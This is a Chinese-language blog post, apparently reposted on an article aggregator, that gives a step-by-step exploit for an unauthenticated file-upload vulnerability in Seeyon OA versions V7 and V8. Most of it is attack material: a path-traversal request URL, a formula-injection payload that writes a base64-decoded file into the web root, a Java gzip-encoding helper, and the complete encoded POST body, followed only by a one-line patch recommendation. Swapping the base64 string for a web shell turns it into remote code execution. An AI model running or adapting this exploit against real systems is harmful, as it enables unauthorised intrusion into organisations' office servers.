致远OA 文件上传漏洞202010

程序员文章站 2022-03-07 12:44:54

0x00 漏洞产生原因某远未授权访问分析 - 宽字节安全 - 博客园 (cnblogs.com)0x01影响范围V7,V80x02 漏洞利用1.漏洞url:/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip2.poc:[{'formulaType': 1, 'formulaName': '......

0x00 漏洞产生原因

某远未授权访问分析 - 宽字节安全 - 博客园 (cnblogs.com)

0x01 影响范围

V7,V8

0x02 漏洞利用

1.漏洞url: /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip

2.poc:

[{'formulaType': 1, 'formulaName': 'test', 'formulaExpression': 'String path = "../webapps/seeyon/";
       	java.io.PrintWriter printWriter2 = new java.io.PrintWriter(path+"test.txt");
        String shell = "dGVzdA==";
        sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
        String decodeString = new String(decoder.decodeBuffer(shell),"UTF-8");
        printWriter2.println(decodeString);
        printWriter2.close();};test();def static xxx(){'}, '', {}, 'true']

3.使用下面脚本进行gzip编码：

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;

public class Gzip {
    /**
     * @param str：正常的字符串 * @return 压缩字符串 类型为：  ³)°K,NIc i£_`Çe#  c¦%ÂXHòjyIÅÖ`     * @throws IOException
     */
    public static String compress(String str) throws IOException {
        if (str == null || str.length() == 0) {
            return str;
        }
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        GZIPOutputStream gzip = new GZIPOutputStream(out);
        gzip.write(str.getBytes());
        gzip.close();
        return out.toString("ISO-8859-1");
    }

    /**
     * @param str：类型为： ³)°K,NIc i£_`Çe#  c¦%ÂXHòjyIÅÖ`     * @return 解压字符串  生成正常字符串。     * @throws IOException
     */
    public static String uncompress(String str) throws IOException {
        if (str == null || str.length() == 0) {
            return str;
        }
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ByteArrayInputStream in = new ByteArrayInputStream(str.getBytes("ISO-8859-1"));
        GZIPInputStream gunzip = new GZIPInputStream(in);
        byte[] buffer = new byte[256];
        int n;
        while ((n = gunzip.read(buffer)) >= 0) {
            out.write(buffer, 0, n);
        }         // toString()使用平台默认编码，也可以显式的指定如toString("GBK")
        return out.toString();
    }

    /**
     * @param jsUriStr :字符串类型为：%1F%C2%8B%08%00%00%00%00%00%00%03%C2%B3)%C2%B0K%2CNI%03c%20i%C2%A3_%60%C3%87e%03%11%23%C2%82%0Dc%C2%A6%25%C3%82XH%C3%B2jyI%C3%85%05%C3%96%60%1E%00%17%C2%8E%3Dvf%00%00%00     * @return 生成正常字符串     * @throws IOException
     */
    public static String unCompressURI(String jsUriStr) throws IOException {
        String decodeJSUri = URLDecoder.decode(jsUriStr, "UTF-8");
        String gzipCompress = uncompress(decodeJSUri);
        return gzipCompress;
    }

    /**
     * @param strData :字符串类型为： 正常字符串     * @return 生成字符串类型为：%1F%C2%8B%08%00%00%00%00%00%00%03%C2%B3)%C2%B0K%2CNI%03c%20i%C2%A3_%60%C3%87e%03%11%23%C2%82%0Dc%C2%A6%25%C3%82XH%C3%B2jyI%C3%85%05%C3%96%60%1E%00%17%C2%8E%3Dvf%00%00%00     * @throws IOException
     */
    public static String compress2URI(String strData) throws IOException {
        String encodeGzip = compress(strData);
        String jsUriStr = URLEncoder.encode(encodeGzip, "UTF-8");
        return jsUriStr;
    }
}

原作者文章：https://blog.csdn.net/qq_44934581/article/details/89417205

4.post内容：

managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uQ%C3%8DK%C3%830%14%3F%C3%AB_%C3%B1%C3%A8%25-%C3%8E%14ED%1C%3Dl8%C2%BD%C2%89%C2%B0%C2%A9%07%C3%B1%10%C3%9BW%17i%C2%93%C2%90%C2%A4%C2%AE%C2%B3%C3%AC%7F7Y%C2%AA-8sy%1Fy%C2%BF%C2%8F%C3%A4%C2%BDt%C2%A4%C2%94%C2%BAn*%C2%B6%C3%9A*%24%C3%97p6%C2%81%C2%9F%C3%8E%3D%C2%AB%7D%C2%87X4%C2%96%0C%C3%ADE%C2%AB4%1A%C3%83%C2%A5%C3%B0%C2%97K%C2%AB%C2%B9x%07%C3%85%C3%AC%1A2%C2%88%28M7%C3%B8%C3%86%C2%942%C2%A9A%C3%9CJ%C2%91F%C3%93c%08%C3%A7%C3%A8%C2%83%7D2%C3%8A%25%7Dp%10%C3%BB%C2%AC%C2%B9E%0Dj%C3%88%C3%8F%1D%C2%81%C3%80%0D%1C%18%C2%8B%3D%C3%BFI%C3%A4%C2%9DP%C3%9B%C3%9A%28%C3%B9%25%C2%85%C3%9E%C2%80YcUy%07%C3%85%C3%9D%C3%93W1%C3%8B%C2%B2A%17L%23h%C3%8DMN%C3%A7%C2%B3%C3%A5%C3%A2%C3%B2%C3%A2%06sY8%C3%A9%C2%A2%C2%8FA%C3%B5%C3%B0P%C3%BCW%29%C3%80%C3%BA%22%60C%11%C3%B7%C2%844%C3%84yS%C2%96%C2%8E%60o%2C%C2%99D%C2%8F%C2%AB%C3%9B%C3%93%C2%AB%C2%B1%C3%B1%C3%B1%C3%8B%C3%A9%C2%BE%C2%A8D%3C%26%C3%BFo6%C2%AF%C2%A4Agl7%C3%B5%C3%BF%C3%A1%C2%92%02K0%C2%96Y%C2%9EC%C3%9B%C2%B6q%C3%92%C2%91%C2%9D%5B%C2%97%5BY%C3%A7%C2%A3%C3%95%0D%C2%92%C3%97o%C2%B2%C2%9A%5B%C2%90%C3%A9%01%00%00

5.上传的文件路径: /seeyon/test.txt

0x04 修复建议

　　升级到最新版或者打补丁。

2020年10-12月安全补丁合集

http://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=1

本文地址：https://blog.csdn.net/nex1less/article/details/112546636

致远OA 文件上传漏洞202010

网站漏洞修复之Metinfo 文件上传漏洞

网络安全漏洞渗透测试之文件上传绕过思路案例详解

「漏洞预警」Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现

关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题

php 上传文件类型判断函数(避免上传漏洞 )

该如何查找网站存在的文件上传漏洞?

文件上传漏洞

F2blog XMLRPC 上传任意文件漏洞

Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现问题(漏洞预警)

最新用友NC6.5文件上传漏洞